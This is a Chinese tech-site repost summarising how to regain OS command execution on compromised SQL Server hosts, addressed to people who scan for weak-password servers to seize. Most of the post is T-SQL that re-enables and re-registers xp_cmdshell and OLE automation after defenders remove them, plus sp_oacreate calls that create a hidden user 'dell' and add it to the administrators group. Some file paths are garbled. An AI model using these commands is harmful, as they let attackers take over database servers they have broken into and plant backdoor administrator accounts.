位置: 编程技术 - 正文

SQL入侵恢复xp_cmdshell方法总结

编辑:rootadmin
SQL入侵恢复xp_cmdshell方法总结 sql server 下开启xp_cmdshell的办法 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; SQL开启'OPENROWSET'支持的方法: exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE; SQL开启'sp_oacreate'支持的方法: exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE; 突破SA的各种困难 常见情况恢复执行xp_cmdshell 1 未能找到存储过程'master..xpcmdshell'. 恢复方法:查询分离器连接后, 第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog.dll'declare @o int 第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql.dll' 然后按F5键命令执行完毕 2 无法装载 DLL xpsql.dll 或该DLL所引用的某一 DLL。原因(找不到指定模块。) 恢复方法:查询分离器连接后, 第一步执行:sp_dropextendedproc "xp_cmdshell" 第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql.dll' 然后按F5键命令执行完毕 3 无法在库 xpweb.dll 中找到函数 xp_cmdshell。原因: (找不到指定的程序。) 恢复方法:查询分离器连接后, 第一步执行:exec sp_dropextendedproc 'xp_cmdshell' 第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb.dll' 然后按F5键命令执行完毕 四.终极方法. 如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户: 查询分离器连接后, servser系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:winntsystemcmd.exe /c net user dell huxifeng /add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:winntsystemcmd.exe /c net localgroup administrators dell /add' xp或server系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystemcmd.exe /c net user dell huxifeng /add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystemcmd.exe /c net localgroup administrators dell /add' -------------- xp_cmdshell新的恢复办法 删除 drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 恢复 dbcc addextendedproc ("sp_oacreate","odsole.dll") dbcc addextendedproc ("xp_cmdshell","xplog.dll") 这样可以直接恢复,不用去管sp_addextendedproc是不是存在 ----------------------------- 删除扩展存储过过程xp_cmdshell的语句: exec sp_dropextendedproc 'xp_cmdshell' 恢复cmdshell的sql语句 exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog.dll' 开启cmdshell的sql语句 exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog.dll' 判断存储扩展是否存在 select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回结果为1就ok 恢复xp_cmdshell exec master.dbo.addextendedproc 'xp_cmdshell','xplog.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回结果为1就ok 否则上传xplog7.0.dll exec master.dbo.addextendedproc 'xp_cmdshell','c:winntsystemxplog.dll' 堵上cmdshell的sql语句 sp_dropextendedproc "xp_cmdshell ---------------- 删除sql危险存储: /*不狐 附上恢复扩展存储过程的办法 先恢复sp_addextendedproc,语句如下: SQL代码: 再恢复以上所有扩展存储过程 SQL代码: SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。 经常扫SQL弱口令肉鸡的朋友应该遇见过这样的问题 ! 接下来我们用SQL语句搞定他 分析器执行的语句: EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE

推荐整理分享SQL入侵恢复xp_cmdshell方法总结,希望有所帮助,仅作参考,欢迎阅读内容。

SQL入侵恢复xp_cmdshell方法总结

文章相关热门搜索词:,内容如对您有帮助,希望把文章链接给更多的朋友!

sqlserver 函数、存储过程、游标与事务模板 1.标量函数:结果为一个单一的值,可包含逻辑处理过程。其中不能用getdate()之类的不确定性系统函数.--标量值函数--==============================================

ADO.NET EF中的实体修改方法 1.传统修改模式,看下列代码using(NorthwindEntitiescontext=newNorthwindEntities()){Regionregion=context.Region.FirstOrDefault(v=v.RegionID==4);region.RegionDescription="Test";context.SaveCha

sqlserver 聚集索引和非聚集索引实例 createdatabasemyIndexDemogousemyIndexDemogocreatetableABC(Aintnotnull,Bchar(),Cvarchar())goinsertintoABCselect1,'B','C'unionselect5,'B','C'unionselect7,'B','C'unionselect9,'B','C'goselect*fromABC-

标签: SQL入侵恢复xp_cmdshell方法总结

本文链接地址:https://www.jiuchutong.com/biancheng/349165.html 转载请保留说明!

上一篇:世界杯猜想活动的各类榜单的SQL语句小结(世界杯猜测)

下一篇:sqlserver 函数、存储过程、游标与事务模板(sqlserver函数大全)

  • 卖旧书侵权吗
  • 办税人是纳税人吗
  • 营业成本在资产负债表哪里
  • 金税盘无法连接jk开票
  • 企业为什么要进行环境分析
  • 贸易公司发票怎么平衡
  • 快递公司结算员工作量大不大
  • 购买电脑配件的网址
  • 异地设立分公司可以独立核算吗
  • 从个人出开进的房租租赁发票可以抵扣几个点?
  • 旅游服务费和旅游费区别
  • 报税了没有交税可以领发票吗
  • 企业所得税补充申报怎么报
  • 1697508513
  • 丢失空白发票怎么处罚
  • 房地产开发企业建造的商品房,在出售前
  • wifi密码忘记了怎么重新设置密码
  • 个人独资所得税税率表最新
  • windows11怎么设置锁屏时间
  • 事业单位接受捐赠固定资产入账
  • 提坏账准备的调整分录
  • 公司员工培训后的收获和感想
  • php单独运行
  • 无运输工具承运业务的经营者适用免税政策
  • linux服务有哪些
  • 马德拉海岛
  • 货物运输业增值税专用发票
  • 固定资产加速一次性扣除
  • 笑脸热气球 (© Leonsbox/Getty Images Plus)
  • 马萨诸塞 下架
  • 相见恨晚求下联
  • 计算机视觉需要学什么
  • 累计摊销属于什么类科目
  • 达摩院 2021
  • vue的一些面试题
  • 单位社保年底清算
  • 以摊余成本计量的金融资产会计处理
  • 帝国cms配置数据库
  • 财务报表中的应收款项包括哪些
  • dedecms使用教程
  • db2教程
  • asp和asp net
  • 更改增值税申报表退税在哪里退钱
  • 国家税务总局公告2011年第25号公告
  • 开的票比实际支付的多,账务怎么处理
  • 有进项发票没有销项发票怎样做账
  • 固定资产达到预定状态的判定
  • 专项应付款和政府补助的区别
  • 房产税税率采用比例税率按照房产余值计征的年税率为
  • 收到投资款应该填制什么凭证
  • 自产自用进项税额
  • 基本工资和什么挂钩
  • 施工人员的工资计入
  • 医疗器械行业进货未取得发票怎么做会计分录的
  • 广告制作费属于现代服务吗
  • 会计准则应收账款计提坏账
  • mysql的操作
  • Win10 Mobile 10563预览版微软官方模拟器下载
  • winxp使用到什么时候
  • docker基础教程
  • 如何去掉windows7开机密码
  • process32first 进程信息为空
  • linux eval命令
  • 一键快速关机下载手机版
  • Android OpenGL ES 入门
  • 移动端网页开发技术
  • Ext4.2的Ext.grid.plugin.RowExpander无法触发事件解决办法
  • jquery easyui开发指南
  • python如何搭建环境
  • perl命令
  • js onkeypress与onkeydown 事件区别详细说明
  • 图片在线预览html5
  • bootstraptable方法
  • 安卓表格布局案例
  • android进度条对话框
  • 税控盘状态
  • 办理税控盘的流程
  • 税代扣代缴
  • 江苏电子税务局网站官网
  • 什么是契税发票?
  • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设